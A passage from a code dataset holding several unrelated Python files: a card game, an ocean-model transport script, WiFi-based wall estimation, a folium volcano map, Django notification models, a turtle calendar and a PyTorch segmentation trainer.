их «старшинства» (например, любая карта масти «бубны» старше\nлюбой карты масти «пики», а «валет червей» старше «десятки червей»).\nПри моделировании названиям мастей и названиям достоинства карты присвоены\nусловные номера:\n• масти «пики» – 1, масти «трефы» – 2, масти «бубны» – 3, масти «червы» – 4;\n• достоинствам: «шестерка» – 6, «семерка» – 7, …, «десятка» – 10,\n«валет» – 11, «дама» – 12, «король» – 13, «туз» – 14.\n'''\n# сделать козырную масть\nfrom random import randint\nimport time\n\nn = 10\npl1 = 0\npl2 = 0\nplayer1 = input('Enter your name: ')\nplayer2 = input('Enter your name: ')\nfor k in range(n):\n num_symbol_1 = randint(1, 4)\n num_digit_1 = randint(6, 14)\n #3. Определение соответствующего названия масти:\n if num_symbol_1 == 1:\n symbol = 'пик'\n elif num_symbol_1 == 2:\n symbol = 'треф'\n elif num_symbol_1 == 3:\n symbol = 'бубен'\n else:\n symbol = 'червей'\n #и названия достоинства карты:\n if num_digit_1 == 6:\n digit = 'Шестерка'\n elif num_digit_1 == 7:\n digit = 'Семерка'\n elif num_digit_1 == 8:\n digit = 'Восьмерка'\n elif num_digit_1 == 9:\n digit = 'Девятка'\n elif num_digit_1 == 10:\n digit = 'Десятка'\n elif num_digit_1 == 11:\n digit = 'Валет'\n elif num_digit_1 == 12:\n digit = 'Дама'\n elif num_digit_1 == 13:\n digit = 'Король'\n else:\n digit = 'Туз'\n print(player1, '- card:', digit, symbol)\n time.sleep(2)\n\n num_symbol_2 = randint(1, 4)\n num_digit_2 = randint(6, 14)\n #3. Определение соответствующего названия масти:\n if num_symbol_2 == 1:\n symbol = 'пик'\n elif num_symbol_2 == 2:\n symbol = 'треф'\n elif num_symbol_2 == 3:\n symbol = 'бубен'\n else:\n symbol = 'червей'\n #и названия достоинства карты:\n if num_digit_2 == 6:\n digit = 'Шестерка'\n elif num_digit_2 == 7:\n digit = 'Семерка'\n elif num_digit_2 == 8:\n digit = 'Восьмерка'\n elif num_digit_2 == 9:\n digit = 'Девятка'\n elif num_digit_2 == 10:\n digit = 'Десятка'\n elif num_digit_2 == 11:\n digit = 'Валет'\n elif num_digit_2 == 12:\n digit = 'Дама'\n elif num_digit_2 == 13:\n digit = 'Король'\n else:\n digit = 'Туз'\n print(player2, '- card:', digit, symbol)\n time.sleep(2)\n\n if num_symbol_1 > num_symbol_2:\n pl1 += 1\n print('@ -',player1,'- @')\n elif num_symbol_2 > num_symbol_1:\n pl2 += 1\n print('@ =',player2,'= @')\n else: #Масти карт игроков одинаковые\n #Сравниваем достоинства карт (их номера)\n if num_digit_1 > num_digit_2:\n pl1 += 1\n print('<',player1,'>')\n elif num_digit_2 > num_digit_1:\n pl2 += 1\n print('<<',player2,'>>')\n else: #Достоинства карт тоже одинаковые3\n print('Ничья!')\n print(player1,':',player2)\n print('% 3d '% pl1, '% 4d '% pl2)\n#Определение результата (3 возможных варианта)\nif pl1 > pl2:\n print('WINNER', player1)\nelif pl1 < pl2:\n print('WINNER', player2)\nelse:\n print('Ничья')","repo_name":"innTall/tasks","sub_path":"games_simples/cards.py","file_name":"cards.py","file_ext":"py","file_size_in_byte":4465,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22386213666","text":"#!/usr/bin/env python\n# coding: utf-8\n\n\"\"\"Export across the 1000-m isobath in MOM6\"\"\"\n\nimport xarray as xr\nimport numpy as np\nimport cosima_cookbook as cc\nfrom dask.distributed import Client\nimport sys\n\nif __name__ == '__main__':\n \n client = Client()\n client\n\n year = int(sys.argv[1])\n year = str(year)\n expt = sys.argv[2]\n expt_name = sys.argv[3]\n contour_depth = sys.argv[4]\n \n db = expt_name + '.db'\n session = cc.database.create_session(db)\n frequency = '1 monthly'\n path_output = '/g/data/e14/cs6673/mom6_comparison/data_DSW/'\n resolution = expt_name.split('_')[1][:-3]\n \n start_time= year + '-01-01'\n end_time= year + '-12-31'\n\n # reference density in MOM6 \n rho_0 = 1035.0\n # Note: change this range, so it matches the size of contour arrays\n lat_range = slice(-79, -55)\n\n '''Open contour data'''\n ds_contour = xr.open_dataset(\n '/home/142/cs6673/work/mom6_comparison/Antarctic_slope_contours/' +\n 'Antarctic_slope_contour_' + str(contour_depth) + 'm_MOM6_' + resolution +\n 'deg.nc')\n\n # load data and rename coordinates to general x/y to be able to multiply them\n mask_y_transport = ds_contour.mask_y_transport.rename(\n {'yq': 'y', 'xh': 'x'})\n mask_x_transport = ds_contour.mask_x_transport.rename(\n {'yh': 'y', 'xq': 'x'})\n mask_y_transport_numbered = ds_contour.mask_y_transport_numbered.rename(\n {'yq': 'y', 'xh': 'x'})\n mask_x_transport_numbered = ds_contour.mask_x_transport_numbered.rename(\n {'yh': 'y', 'xq': 'x'})\n\n # number of points along contour:\n num_points = int(np.maximum(\n np.max(mask_y_transport_numbered),np.max(mask_x_transport_numbered)))\n \n '''Stack contour data into 1D and extract lat/lon on contour'''\n # Create the contour order data-array. Note that in this procedure the\n # x-grid counts have x-grid dimensions and the y-grid counts have y-grid\n # dimensions, but these are implicit, the dimension *names* are kept\n # general across the counts, the generic y/x, so that concatening\n # works but we dont double up with numerous counts for one lat/lon\n # point.\n \n # stack contour data into 1d:\n mask_x_numbered_1d = mask_x_transport_numbered.stack(contour_index = ['y', 'x'])\n mask_x_numbered_1d = mask_x_numbered_1d.where(mask_x_numbered_1d > 0, drop = True)\n mask_y_numbered_1d = mask_y_transport_numbered.stack(contour_index = ['y', 'x'])\n mask_y_numbered_1d = mask_y_numbered_1d.where(mask_y_numbered_1d > 0, drop = True)\n contour_ordering = xr.concat((mask_x_numbered_1d,mask_y_numbered_1d), dim = 'contour_index')\n contour_ordering = contour_ordering.sortby(contour_ordering)\n\n # get lat and lon along contour, useful for plotting later:\n lat_along_contour = contour_ordering.y\n lon_along_contour = contour_ordering.x\n contour_index_array = np.arange(1,len(contour_ordering)+1)\n # don't need the multi-index anymore, replace with contour count and save\n lat_along_contour = lat_along_contour.drop_vars({'x', 'y', 'contour_index'})\n lat_along_contour.coords['contour_index'] = contour_index_array\n lon_along_contour = lon_along_contour.drop_vars({'x', 'y', 'contour_index'})\n lon_along_contour.coords['contour_index'] = contour_index_array\n \n '''Load mass transport umo and vmo'''\n vmo = cc.querying.getvar(\n expt, 'vmo', session, frequency=frequency,\n start_time=start_time, end_time=end_time,\n chunks={'xh': '200MB', 'yq': '200MB'})\n umo = cc.querying.getvar(\n expt, 'umo', session, frequency=frequency,\n start_time=start_time, end_time=end_time,\n chunks={'xq': '200MB', 'yh': '200MB'})\n\n # select latitude range and this year:\n vmo = vmo.sel(yq=lat_range).sel(time=slice(start_time,end_time))\n vmo = vmo.isel(yq=slice(1, None))\n umo = umo.sel(yh=lat_range).sel(time=slice(start_time,end_time))\n umo = umo.isel(xq=slice(1, None))\n\n # Note that vmo is Ocean Mass Y Transport (kg s-1) and defined as the transport across\n # the northern edge of a tracer cell so its coordinates should be (yq, xh).\n # umo is Ocean Mass X Transport (kg s-1) and defined as the transport across\n # the eastern edge of a tracer cell so its coordinates should be (yh, xq).\n # However we will keep the actual name as simply y/x irrespective of the variable\n # to make concatenation and sorting possible.\n vmo = vmo.rename({'yq':'y', 'xh':'x'})\n umo = umo.rename({'yh':'y', 'xq':'x'})\n\n # convert kg/s to Sv and multiply by contour masks\n vmo = vmo/(1e6*rho_0)*mask_y_transport\n umo = umo/(1e6*rho_0)*mask_x_transport\n \n '''Extract transport values along contour'''\n umo_i = umo.compute()\n vmo_i = vmo.compute()\n\n # stack transports into 1d and drop any points not on contour:\n x_transport_1d_i = umo_i.stack(contour_index=['y', 'x'])\n x_transport_1d_i = x_transport_1d_i.where(mask_x_numbered_1d>0, drop=True)\n y_transport_1d_i = vmo_i.stack(contour_index=['y', 'x'])\n y_transport_1d_i = y_transport_1d_i.where(mask_y_numbered_1d>0, drop=True)\n\n # combine all points on contour:\n vol_trans_across_contour = xr.concat(\n (x_transport_1d_i, y_transport_1d_i), dim='contour_index')\n vol_trans_across_contour = vol_trans_across_contour.sortby(contour_ordering)\n vol_trans_across_contour = vol_trans_across_contour.drop_vars(\n {'x', 'contour_index', 'y'})\n vol_trans_across_contour.coords['contour_index'] = contour_index_array\n vol_trans_across_contour = vol_trans_across_contour.compute()\n \n '''Save data'''\n vol_trans_across_contour.name = 'vol_trans_across_contour'\n vol_trans_across_contour.attrs = {\n 'long_name': 'Volume transport across 1000-m isobath',\n 'units': 'Sv'}\n ds = vol_trans_across_contour.to_dataset()\n ds['lat'] = lat_along_contour\n ds['lon'] = lon_along_contour\n if len(vol_trans_across_contour.contour_index) < 15000:\n chunk_ind = len(vol_trans_across_contour.contour_index)\n else:\n chunk_ind = 10000\n enc = {'vol_trans_across_contour':\n {'chunksizes': (12, 99, chunk_ind),\n 'zlib': True, 'complevel': 5, 'shuffle': True}}\n ds.to_netcdf(\n path_output + 'vol_transp_across_' + str(contour_depth) +\n 'm_isobath_' + expt_name + '_' + frequency[:3:2] + '_' +\n year + '.nc', encoding=enc)","repo_name":"schmidt-christina/mom6_comparison","sub_path":"Shelf_export_calculation.py","file_name":"Shelf_export_calculation.py","file_ext":"py","file_size_in_byte":6403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22991323676","text":"''' Given a dictionary of kvalues: coneshapes, estimate wall locations and return their coordinates.'''\n\nfrom shapely.geometry import Point, Polygon, MultiPoint, LineString, MultiLineString\nfrom shapely.ops import polygonize, cascaded_union\nfrom shapely import affinity\nfrom bresenham import bresenham\nimport numpy as np\nimport math\nimport boundary_estimation.vertical_boundary_estimation as vertical_boundary_estimation \nimport boundary_estimation.horizontal_boundary_estimation as horizontal_boundary_estimation \nimport grid_mapping.grid_map as grid_map\n\n\ndef boundaryEstimation(kvalue_coneshapes, trajectory_kvalues):\n # Initialize new gridmap for estimated wall coordinates\n estimatedMap = grid_map.GridMap('')\n estimatedMap.plotTrajectory(trajectory_kvalues)\n \n total_wall_coordinates = []\n \n # Identifying Outer Walls\n outer_wall_coords = outerWallCoordinates(trajectory_kvalues)\n total_wall_coordinates += outer_wall_coords\n \n # Identifying Inner Walls\n for kval in kvalue_coneshapes:\n if kval == 0: continue\n \n poly = kvalue_coneshapes[kval]\n prevpoly = previousPolygon(kvalue_coneshapes[kval-1], poly) \n inner_line_segments=[]\n \n if type(poly) == list: # if multiple polys for kvalue\n for p in poly:\n # print(p, kval)\n wall_coordinates = polygonHandler(p, prevpoly)\n \n if poly.index(p) == 0:\n constant_value, constant_index = getWallConstants(wall_coordinates)\n # else:\n # wall_coordinates = smoothCoordinates(wall_coordinates, constant_value, constant_index)\n \n total_wall_coordinates+=wall_coordinates\n inner_line_segments.append(wall_coordinates)\n if type(poly) == Polygon: # only one polygon \n wall_coordinates = polygonHandler(poly, prevpoly)\n total_wall_coordinates += wall_coordinates\n inner_line_segments.append(wall_coordinates)\n extended_segments = mapCompletion(inner_line_segments, outer_wall_coords)\n for seg in extended_segments:\n total_wall_coordinates += seg\n # Remove coordinates coinciding with the trajectory\n trajectory = list(trajectory_kvalues[0].keys())\n for coord in trajectory:\n if coord in total_wall_coordinates:\n total_wall_coordinates.remove(coord)\n \n estimatedMap = estimatedMap.plotWallCoordinates(total_wall_coordinates) \n \n return total_wall_coordinates\n\ndef getWallConstants(wall_coordinates):\n if wall_coordinates == []: return None, None\n startpt, endpt = wall_coordinates[0], wall_coordinates[-1]\n if startpt[0] == endpt[0]:\n return startpt[0], 0\n elif startpt[1] == endpt[1]:\n return startpt[1], 1\n\ndef smoothCoordinates(wall_coordinates, constant_value, constant_index): \n ''' Ensure coordinates have the same constant (x/y) value'''\n new_wall_coordinates=[]\n for coord in wall_coordinates:\n if constant_index == 0:\n new_coord = (constant_value, coord[1])\n new_wall_coordinates.append(new_coord)\n elif constant_index == 1:\n new_coord = (coord[0], constant_value)\n new_wall_coordinates.append(new_coord)\n print(new_wall_coordinates, wall_coordinates)\n return new_wall_coordinates\n\ndef closestpoint(outer_wall_coords, point):\n shortest_dist = None\n closest_point = None\n for coord in outer_wall_coords:\n norm = np.linalg.norm(np.array(point)-np.array(coord))\n if shortest_dist == None or norm < shortest_dist:\n closest_point = coord\n shortest_dist = norm\n return closest_point, shortest_dist\n\ndef extendLine(segment, extension_point, end_point, index_of_interest):\n if index_of_interest == 0: # extending horizontally\n j = extension_point[1]\n extended_segment=[]\n start, end = min(extension_point[0], end_point[0]), max(extension_point[0], end_point[0])\n for i in range(start, end):\n extended_segment.append((i,j))\n elif index_of_interest == 1: # extending vertically\n i = extension_point[0]\n extended_segment = []\n start, end = min(extension_point[1], end_point[1]), max(extension_point[1], end_point[1])\n for j in range(start, end):\n extended_segment.append((i,j))\n\n return extended_segment\n\ndef decomposeSegment(segment):\n # return segments in order of [horizontal segment, vertical segment]\n horizontal_segment, vertical_segment = None, None\n start1, start2 = segment[0], segment[1]\n if start1[0] == start2[0]: \n horizontal_segment = [start1]\n for coord in segment:\n if coord == start1: continue\n if coord[0] == start1[0]:\n horizontal_segment.append(coord)\n else:\n vertical_segment = [coord]\n break\n for coord in segment:\n if coord == vertical_segment[0]: continue\n if coord[1] == vertical_segment[0][1]:\n vertical_segment.append(coord)\n \n elif start1[1] == start2[1]:\n vertical_segment = [start1]\n for coord in segment: \n if coord == start1: continue\n if coord[1] == start1[1]:\n vertical_segment.append(coord)\n else:\n horizontal_segment = [coord]\n break\n for coord in segment:\n if coord == horizontal_segment[0]: continue\n if coord[0] == horizontal_segment[0][0]:\n horizontal_segment.append(coord)\n \n \n return[horizontal_segment, vertical_segment]\n \n \n\ndef mapCompletion(inner_line_segments, outer_wall_coords):\n # For every inner line segment, choose one endpoint to extend until it encounters another wall\n extended_segs=[]\n decomposed_segs=[] # segments with both horiz and vertical component\n for seg in inner_line_segments:\n if seg == []: continue\n startpt, endpt = seg[0], seg[-1]\n if startpt[0] == endpt[0]: index_of_interest = 1 # xval constant; extend along y\n elif startpt[1] == endpt[1]: index_of_interest = 0 #yval constant; extend along x\n else:\n decomposed_segments = decomposeSegment(seg)\n decomposed_segs += decomposed_segments\n continue\n \n closest_point_to_start, start_dist = closestpoint(outer_wall_coords, startpt)\n closest_point_to_end, end_dist = closestpoint(outer_wall_coords, endpt)\n \n if start_dist < end_dist:\n extended_segment = extendLine(seg, startpt, closest_point_to_start, index_of_interest)\n extended_segs.append(extended_segment)\n elif end_dist < start_dist:\n extended_segment = extendLine(seg, endpt, closest_point_to_end, index_of_interest)\n extended_segs.append(extended_segment)\n \n for seg in decomposed_segs:\n if seg == []: continue\n startpt, endpt = seg[0], seg[-1]\n if startpt[0] == endpt[0]: index_of_interest = 1 # xval constant; extend along y\n elif startpt[1] == endpt[1]: index_of_interest = 0 #yval constant; extend along x\n closest_point_to_start, start_dist = closestpoint(outer_wall_coords, startpt)\n closest_point_to_end, end_dist = closestpoint(outer_wall_coords, endpt)\n \n if start_dist <= end_dist:\n extended_segment = extendLine(seg, startpt, closest_point_to_start, index_of_interest)\n extended_segs.append(extended_segment)\n elif end_dist < start_dist:\n extended_segment = extendLine(seg, endpt, closest_point_to_end, index_of_interest)\n extended_segs.append(extended_segment)\n \n \n \n return extended_segs\n\n\ndef outerWallCoordinates(trajectory_kvalues, offset_distance=1.1):\n '''\n Return a list of grid coordinates corresponding to the smallest envelope encompassing the coordinates\n of the trajectory and the inner walls identified\n :type trajectory_kvalues: list with 2 elements: [dict of {coord: kval}, (routerx, routery)]\n :rtype: list\n '''\n outer_wall_coords = []\n trajectory = list(trajectory_kvalues[0].keys())\n trajectoryMultiPoint = MultiPoint(trajectory)\n outer_wall_corners = trajectoryMultiPoint.envelope\n outer_wall_corners = list(outer_wall_corners.exterior.coords)\n outer_wall_lines = []\n for i in range(len(outer_wall_corners)-1):\n point1 = outer_wall_corners[i]\n point2 = outer_wall_corners[i+1]\n linestring = LineString([point1, point2])\n outer_wall_lines+=list(linestring.coords)\n \n inner_bounding_box = Polygon(outer_wall_lines)\n inner_bounding_box_scaled = affinity.scale(inner_bounding_box, xfact=offset_distance, yfact=offset_distance)\n \n outer_wall_lines=list(inner_bounding_box_scaled.exterior.coords)\n for i in range(len(outer_wall_lines)-1):\n p1 = (int(outer_wall_lines[i][0]), int(outer_wall_lines[i][1]))\n p2 = (int(outer_wall_lines[i+1][0]), int(outer_wall_lines[i+1][1]))\n \n line = list(bresenham(p1[0],p1[1], p2[0],p2[1]))\n outer_wall_coords+=line\n return outer_wall_coords\n\n\n\n\ndef previousPolygon(prevpoly, poly):\n '''\n Given a list of polygons OR a Polygon with kvalue = ki, return the one which is touching the kj polygon to be used for comparsion\n :rtype: Polygon\n '''\n if type(prevpoly) == Polygon:\n return prevpoly\n elif type(prevpoly) == list:\n for p in prevpoly:\n if p.intersects(poly):\n return p\n\n\n\n\ndef slope(x1, y1, x2, y2):\n if abs(x2-x1) == 0:\n return math.inf\n slope = (y2-y1)/(x2-x1)\n return slope\n\ndef wallType(intersection):\n ''' Determine whether wall is vertical or horizontal based on intersection slope'''\n eps1, eps2, alpha = 8, .7, 1\n x1, y1, x2, y2 = intersection.coords[0][0], intersection.coords[0][1], intersection.coords[1][0], intersection.coords[1][1]\n m = slope(x1, y1, x2, y2)\n norm = np.linalg.norm(np.array([x2,y2])-np.array([x1,y1])) # exclude lines with endpoints too close to one another\n \n if (abs(m) > eps1) and norm > alpha:\n return(\"vertical\")\n elif (abs(m) < eps2) and norm > alpha:\n return(\"horizontal\")\n\n\ndef polygonHandler(poly, prevpoly):\n ''' :type poly: current kj Polygon (k_i-1) polygon being analyzed for walls\n :type prevpoly: ki Polygon being compared with kj polygon\n :rtype: wall coordinates \n '''\n # Wall is located in the same direction as the intersection line\n \n intersection = poly.intersection(prevpoly)\n wall_coordinates = [] \n if intersection.geom_type == 'GeometryCollection':\n print(poly)\n for inter in intersection:\n print(inter)\n if inter.geom_type == 'LineString':\n wall_type = wallType(inter)\n if wall_type == 'vertical': \n # print(\"Vertical wall found\")\n wall_coordinates += vertical_boundary_estimation.polygonVerticalWallCoordinates(poly, inter) \n elif wall_type == 'horizontal':\n wall_coordinates += horizontal_boundary_estimation.polygonHorizontalWallCoordinates(poly, inter) \n print(\"\\n\")\n \n elif intersection.geom_type == 'LineString':\n \n wall_coordinates = []\n wall_type = wallType(intersection)\n if wall_type == 'vertical': \n # print(\"Vertical wall found\") \n wall_coordinates += vertical_boundary_estimation.polygonVerticalWallCoordinates(poly, intersection)\n elif wall_type == 'horizontal':\n wall_coordinates += horizontal_boundary_estimation.polygonHorizontalWallCoordinates(poly, inter) \n elif intersection.geom_type == 'MultiLineString':\n wall_coordinates = []\n for inter in intersection:\n if inter.geom_type == 'LineString':\n wall_type = wallType(inter)\n if wall_type == 'vertical': \n print(inter)\n wall_coordinates += vertical_boundary_estimation.polygonVerticalWallCoordinates(poly, inter) \n elif wall_type == 'horizontal':\n wall_coordinates += horizontal_boundary_estimation.polygonHorizontalWallCoordinates(poly, inter) \n \n return wall_coordinates\n\n","repo_name":"uncobruce/Structure-From-Wifi","sub_path":"sparse_inverse/boundary_estimation/boundary_estimation_main.py","file_name":"boundary_estimation_main.py","file_ext":"py","file_size_in_byte":12469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4640606357","text":"import folium\nimport pandas\n\ndata = pandas.read_csv(\"Volcanoes.txt\")\nlon = list(data[\"LON\"])\nlat = list(data[\"LAT\"])\nelev = list(data[\"ELEV\"])\n\n\nmap = folium.Map(location=[38.58, -99.09], zoom_start=6, tiles='Mapbox Bright')\nfg_v = folium.FeatureGroup(name=\"Volcanoes\")\n\nfor lt, lon, el in zip(lat,lon,elev):\n\tif el < 1000:\n\t\tcolor = 'green'\n\telif 1000 <= el < 3000:\t\n\t\tcolor = 'orange'\n\telse:\n\t\tcolor = 'red'\n\tfg_v.add_child(folium.CircleMarker(location=[lt, lon],popup=\"Elevation: {0} m\".format(el),radius=6, fill_color=color, color=\"grey\",fill_opacity = 0.7))\n\nfg_p = folium.FeatureGroup(name=\"Population\")\n\nfg_p.add_child(folium.GeoJson(data=open('world.json','r', encoding='utf-8-sig'),style_function = lambda x:{'fillColor': 'green' if x['properties']['POP2005'] < 10000000 else 'orange' if 10000000 <= x['properties']['POP2005'] < 20000000 else 'red' }))\n\nmap.add_child(fg_v)\nmap.add_child(fg_p)\nmap.add_child(folium.LayerControl())\nmap.save(\"Map1.html\")","repo_name":"wojkos/Learn","sub_path":"Python/mapping/map1.py","file_name":"map1.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"43872107052","text":"from django.db import models\nfrom django.core.validators import MinValueValidator, MaxValueValidator\nfrom medml import models as med_models\n\n\nclass MailType(models.IntegerChoices):\n MSG = 0\n EXPERT_REPLY = 1\n\n\nclass MailDetails(models.Model):\n \"\"\"\n Комментарии к сообщению к эксперту\n \"\"\"\n msg = models.TextField(\n \"Комментарии\",\n default=\"\"\n )\n\n mail_type = models.IntegerField(\n choices=MailType.choices,\n verbose_name=\"Тип соощения\",\n default=0\n )\n\n nodule_type = models.IntegerField(\n \"Тип узла\",\n validators=[MinValueValidator(1), MaxValueValidator(5)],\n default=1,\n null=True\n )\n\n\n class Meta:\n verbose_name=\"Комментарии к сообщению\"\n verbose_name_plural = \"Комментарии к сообщению\"\n\n\nclass NotificationGroup(models.Model):\n title = models.CharField(\n \"Заголовок уведомления\",\n max_length=512,\n default=\"\"\n )\n\n uzi_patient_card = models.ForeignKey(\n med_models.PatientCard,\n on_delete=models.CASCADE,\n verbose_name=\"Карта приема\",\n null=True\n )\n\n create_date = models.DateTimeField(\n verbose_name=\"Дата создания группы\",\n auto_now_add=True\n )\n \n members = models.ManyToManyField(\n med_models.MedWorker,\n verbose_name='Участники',\n related_name='notif_members'\n )\n\n class Meta:\n verbose_name=\"Внутренее уведомление\"\n verbose_name_plural = \"Внутрение уведомления\"\n\n\n\nclass Notification(models.Model):\n notification_group = models.ForeignKey(\n NotificationGroup,\n models.CASCADE,\n verbose_name='Кому',\n related_name='notif_group'\n )\n \n notification_author = models.ForeignKey(\n med_models.MedWorker,\n models.CASCADE,\n verbose_name='От кого',\n related_name='notif_author'\n )\n\n details = models.ForeignKey(\n MailDetails,\n on_delete=models.CASCADE,\n verbose_name='Детали к сообщению',\n default=\"\"\n )\n\n create_date = models.DateTimeField(\n verbose_name=\"Дата создания сообщения\",\n auto_now_add=True\n )\n\n class Meta:\n verbose_name=\"Уведомление\"\n verbose_name_plural = \"Уведомления\"\n\n\nclass NotificationDynamics(models.Model):\n mail = models.ForeignKey(\n Notification,\n on_delete=models.CASCADE,\n verbose_name=\"Просмотренное Уведомление\",\n )\n\n user = models.ForeignKey(\n med_models.MedWorker,\n on_delete=models.CASCADE,\n verbose_name=\"Кто про��мотрел уведомление\",\n )\n\n class MailStatus(models.IntegerChoices):\n NOT_VIEWED = 0\n VIEWED = 1\n\n status = models.IntegerField(\n choices=MailStatus.choices,\n verbose_name=\"Статус Уведомление\",\n default=0\n )\n\n update_date = models.DateTimeField(\n \"Дата изменения\",\n auto_now=True\n )\n\n class Meta:\n verbose_name=\"Динамика Уведомление\"\n verbose_name_plural = \"Динамика Уведомление\"\n unique_together = ('mail', 'status','user')\n","repo_name":"Sborzov456/medml-server","sub_path":"medweb/inner_mail/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3160,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72416856489","text":"import turtle as t\r\n\r\nwn = t.Screen()\r\nwn.tracer(0)\r\nscreen = t.Screen()\r\nscreen.screensize(2000 ,10000)\r\nt.setup()\r\nt.speed(0)\r\n\r\narr_day = [\"Mo\",\"Tu\",\"We\",\"Th\",\"Fr\",\"Sa\",\"Su\"]\r\narr_month =[\"January\", 'February', 'March', 'April', 'May', 'June', 'July', 'August', 'September', 'October', 'November', 'December']\r\n\r\ndef month(month_no, start_day, no_days, a = 6, b = 7 ):\r\n \r\n #title\r\n for i in range(2):\r\n t.fd(280)\r\n t.right(90)\r\n t.fd(20)\r\n t.right(90)\r\n\r\n t.right(90)\r\n t.fd(20)\r\n t.left(90)\r\n t.write(f\"\\t\\t {arr_month[month_no-1]} 2023\")\r\n \r\n \r\n for cols in range(len(arr_day)):\r\n for i in range(2):\r\n t.fd(40)\r\n t.right(90)\r\n t.fd(20)\r\n t.right(90)\r\n\r\n #table\r\n t.penup()\r\n t.right(45)\r\n t.fd(25)\r\n t.left(45)\r\n t.pendown()\r\n t.write(arr_day[cols])\r\n t.penup()\r\n t.right(45)\r\n t.fd(-25)\r\n t.left(45)\r\n t.pendown()\r\n t.fd(40)\r\n \r\n t.fd(-280)\r\n t.penup()\r\n t.right(90)\r\n t.fd(20)\r\n t.left(90)\r\n t.pendown()\r\n\r\n \r\n c = 0\r\n day = 0\r\n for i in range(a):\r\n for cols in range(b):\r\n for j in range(2):\r\n t.fd(40)\r\n t.right(90)\r\n t.fd(20)\r\n t.right(90)\r\n c += 1\r\n \r\n if c >= start_day and c <= no_days:\r\n day += 1\r\n\r\n t.penup()\r\n t.right(45)\r\n t.fd(25)\r\n t.left(45)\r\n t.pendown()\r\n t.write(day)\r\n t.penup()\r\n t.right(45)\r\n t.fd(-25)\r\n t.left(45)\r\n t.pendown()\r\n \r\n t.fd(40)\r\n \r\n t.fd(-280)\r\n t.penup()\r\n t.right(90)\r\n t.fd(20)\r\n t.left(90)\r\n t.pendown()\r\n\r\ndef draw_month():\r\n t.penup()\r\n t.goto(0, 0)\r\n t.pendown()\r\n \r\n\r\ndef calendar_of_2023(month_no):\r\n if (month_no == 1):\r\n draw_month()\r\n month(1,7,37)\r\n\r\n elif (month_no == 2):\r\n draw_month()\r\n month(2,3,30)\r\n \r\n elif (month_no == 3):\r\n draw_month()\r\n month(3,3,33)\r\n\r\n elif (month_no == 4):\r\n draw_month()\r\n month(4,6,35)\r\n\r\n elif (month_no == 5):\r\n draw_month()\r\n month(5,1,31)\r\n \r\n elif (month_no == 6):\r\n draw_month()\r\n month(6,4,33)\r\n\r\n elif (month_no == 7):\r\n draw_month()\r\n month(7,6,36)\r\n\r\n elif (month_no == 8):\r\n draw_month()\r\n month(8,2,32)\r\n\r\n elif (month_no == 9):\r\n draw_month()\r\n month(9,5,34)\r\n\r\n elif (month_no == 10):\r\n draw_month()\r\n month(10,7,37)\r\n\r\n\r\n elif (month_no == 11):\r\n draw_month()\r\n month(11,3,32)\r\n\r\n elif (month_no == 12):\r\n draw_month()\r\n month(12,5,35)\r\n\r\n\r\n \r\ndef main():\r\n #Enter the number of desired month in the function calendar_of_2023 \r\n calendar_of_2023(1)\r\n t.exitonclick()\r\n\r\nmain()","repo_name":"Teemy17/Python-KMITL","sub_path":"Intro computer programming/HW06/Q2.py","file_name":"Q2.py","file_ext":"py","file_size_in_byte":3125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39808372574","text":"from __future__ import print_function\n\nimport sys\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\n\nsys.path.append('./')\n\nfrom sembm.core.opts import get_arguments\nfrom sembm.datasets import get_dataloader, get_num_classes, get_class_names\nfrom sembm.models import build_model\nfrom sembm.core.base_trainer import BaseTrainer\nfrom sembm.core.config import cfg, cfg_from_file, cfg_from_list\nfrom sembm.utils.timer import Timer\nfrom sembm.apis.eval import evaluate\n\n\nclass DecTrainer(BaseTrainer):\n\n def __init__(self, args, **kwargs):\n super(DecTrainer, self).__init__(args, **kwargs)\n\n # dataloader\n self.trainloader = get_dataloader(\n cfg.DATASET.NAME,\n cfg,\n 'train',\n batch_size=cfg.TRAIN.BATCH_SIZE,\n num_workers=cfg.TRAIN.NUM_WORKERS,\n test_mode=False)\n self.valloader = get_dataloader(\n cfg.DATASET.NAME, cfg, 'val', batch_size=1, num_workers=cfg.TRAIN.NUM_WORKERS, test_mode=True)\n\n self.nclass = get_num_classes(cfg.DATASET.NAME)\n self.classNames = get_class_names(cfg.DATASET.NAME)\n assert self.nclass == len(self.classNames)\n\n # model\n self.enc = build_model(cfg).cuda()\n\n # optimizer using different LR\n enc_params = self.enc.parameter_groups(cfg.NET.LR, cfg.NET.WEIGHT_DECAY)\n self.optim_enc = self.get_optim(enc_params, cfg.NET)\n\n # checkpoint management\n self._define_checkpoint('enc', self.enc, self.optim_enc)\n self._load_checkpoint(args.resume)\n\n # using cuda\n self.enc = nn.DataParallel(self.enc)\n\n self._iter = 0\n\n def train_step(self, epoch, batched_inputs):\n\n PRETRAIN = epoch < cfg.TRAIN.PRETRAIN\n\n for k in ['img', 'pix_gt', 'img_gt', 'raw_img']:\n if isinstance(batched_inputs[k], torch.Tensor):\n batched_inputs[k] = batched_inputs[k].cuda()\n batched_inputs['PRETRAIN'] = PRETRAIN\n # classification\n output = self.enc(batched_inputs)\n losses = {k: v.mean() for k, v in output.items() if k.startswith('loss')}\n loss = sum(losses.values())\n\n if self.enc.training:\n self.optim_enc.zero_grad()\n loss.backward()\n self.optim_enc.step()\n\n self._iter += 1\n\n losses[\"loss\"] = loss\n losses = {k: v.item() for k, v in losses.items() if k.startswith('loss')}\n\n # make sure to cut the return values from graph\n return losses\n\n def train_epoch(self, epoch):\n self.enc.train()\n\n # adding stats for classes\n timer = Timer(\"New Epoch: \")\n for i, dataset_dict in enumerate(self.trainloader):\n losses = self.train_step(epoch, dataset_dict)\n\n # intermediate logging\n if i % 10 == 0:\n msg = \"Loss [{:04d}]: \".format(i)\n for loss_key, loss_val in losses.items():\n msg += \"{}: {:.4f} | \".format(loss_key, loss_val)\n\n msg += \" | 